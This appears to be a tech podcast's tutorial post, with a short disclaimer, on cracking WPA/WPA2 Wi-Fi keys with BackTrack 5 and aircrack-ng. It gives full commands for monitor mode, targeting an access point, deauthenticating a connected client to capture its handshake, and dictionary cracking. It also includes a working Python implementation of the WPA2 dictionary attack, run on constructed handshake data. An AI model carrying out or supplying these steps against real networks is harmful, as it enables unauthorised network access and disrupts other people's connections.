Disclaimer: The tutorial featured in this episode is for educational, white-hat purposes only. You must not use it to gain unauthorized access to wireless networks you do not have permission to use; use it only on your own wireless network. We cannot be held responsible if your local law enforcement agency catches you hacking.
In the last part of our tutorial, we showed you how to burn BackTrack 5 to a DVD. If you would rather run it from a USB flash drive, use UNetbootin. In this show we do the actual cracking. Before we get to the tutorial: you can also attack a router with Reaver (which comes with BackTrack 5), which brute-forces the WPS PIN instead of guessing the WPA passphrase; we will post that tutorial on this site very soon, so stay tuned.
This is where we should say that you will need a pen and paper, or a copy of gedit open (gedit also comes with BackTrack). First, go to Applications in the top left-hand corner of the screen, then select Accessories and click Terminal.
step 1: To find the name and MAC address of our wireless NIC, type in iwconfig. A MAC address is a string of 12 hexadecimal characters (0 through 9 and A through F), usually written as six pairs separated by colons. Highlight your MAC address, right-click and select copy, then go to gedit, hold down control (Ctrl) and press V to paste it. In our case the interface was called wlan1.
step 2: To put our wireless NIC into monitor mode, type in airmon-ng start wlan1. This creates a new interface called mon0; use that monitor interface, not wlan1, in every command that follows. If airmon-ng warns about processes that could cause trouble (NetworkManager or wpa_supplicant, for example), stop them first, otherwise the capture may be unreliable.
step 3: To find the access point we are trying to attack, type in airodump-ng followed by our monitor interface (in our case, airodump-ng mon0). Copy the BSSID (Basic Service Set Identifier, which is the access point's MAC address) of the network you want to attack into gedit, and note its channel from the CH column as well; you will need both later.
step 4: Now we capture only the traffic going to that access point. Type in the command: airodump-ng --channel (channel number) --bssid (BSSID) -w (capture file prefix) mon0. The -w option names the output files rather than the network; we used the network name as the prefix, so airodump-ng wrote linksys-01.cap. Keep this running and open a new terminal by holding down the control and shift keys whilst pressing the N key on your keyboard.
step 5: To capture the 4-way handshake we need a second device (a computer, tablet or smartphone) that has already connected to the network via Wi-Fi: we force it to disconnect with a deauthentication frame and capture the handshake when it reconnects. In the new terminal type in aireplay-ng -0 1 -a (BSSID) -c (MAC address of the target device) mon0; -0 1 sends a single round of deauthentication packets, and the target's MAC address is listed under STATION in the airodump-ng window. Go back to the first terminal window: once you see the words "WPA handshake:" followed by the BSSID at the top, the capture is complete and you can stop airodump-ng by holding down the control key and pressing C. This is where you will need to either create a dictionary file or get one; you can use crunch (also in BackTrack) to generate a wordlist.
step 6: Now for the actual finding of the wireless key. Type in aircrack-ng -w (complete path of your dictionary file) -b (BSSID) (name of your packet capture file, e.g. linksys-01.cap). This can take a long time: for every word in the dictionary, aircrack-ng derives a candidate key (4096 rounds of PBKDF2 per word) and checks it against the captured handshake, so it only succeeds if your wireless key is actually in the dictionary file. If aircrack-ng reports that the capture contains no valid handshake, go back to step 5 and deauthenticate the client again.
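To make clear what aircrack-ng is actually doing in step 6 (and why it is slow), here is an added example in Python that is not part of the podcast or of the aircrack-ng suite: it implements the WPA2-PSK check a dictionary attack performs, from passphrase to PMK (PBKDF2-HMAC-SHA1, 4096 rounds), PTK, KCK and finally the MIC on handshake message 2, and runs it over a wordlist. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the example rather than taken from a capture; a real attack would read those fields out of the .cap file instead.

```python
import hashlib
import hmac

# Constructed sample handshake parameters (made up for this example, not
# taken from any real capture): SSID, AP and client MACs, and the two nonces.
SSID = b"linksys"
AP_MAC = bytes.fromhex("001122aabbcc")
CLIENT_MAC = bytes.fromhex("ddeeff445566")
ANONCE = bytes(range(32))          # nonce the AP sends in message 1
SNONCE = bytes(range(32, 64))      # nonce the client sends in message 2
MIC_OFFSET = 81                    # EAPOL header (4) + Key fields before the MIC (77)


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make every dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1 over label||0x00||data||i, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK derivation; its first 16 bytes are the KCK that MICs the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key frame shaped like handshake message 2 (RSN, HMAC-SHA1-128 MIC)."""
    key_info = (0x010A).to_bytes(2, "big")  # descriptor version 2, pairwise, MIC bit set
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + mic + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed (WPA2/AES: HMAC-SHA1, 16 bytes)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_frame):
    """Dictionary attack: derive PMK -> PTK -> KCK for each word and compare the MIC."""
    target_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8-63 characters; skip junk
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), target_mic):
            return candidate
    return None


def make_sample_capture(passphrase: bytes) -> bytes:
    """Stands in for the handshake airodump-ng saved: message 2 MIC'd with the real passphrase."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned))


def demo(wordlist=(b"letmein", b"qwertyuiop", b"password123", b"trustno1")):
    """Crack a constructed capture whose passphrase is in the (constructed) wordlist."""
    frame = make_sample_capture(b"password123")
    return crack_handshake(wordlist, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, frame)


if __name__ == "__main__":
    print(demo())
```

The MIC check here is the WPA2/AES variant (HMAC-SHA1 truncated to 16 bytes); WPA/TKIP handshakes use HMAC-MD5 instead, which aircrack-ng selects from the key descriptor version in the frame. Everything before the MIC comparison is the same, and the PBKDF2 step dominates the run time, which is why a large wordlist against a single handshake takes so long.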
We are pleased to announce that we will soon be making the leap from an audio to a video podcast. If you have made an intro theme, please submit it as an MP3 file to mhftechnet@gmail.com.
If there is a how-to you would like us to do, or you have any questions, comments, feedback or anything we have missed, send us an email at howtos@mhftech.net.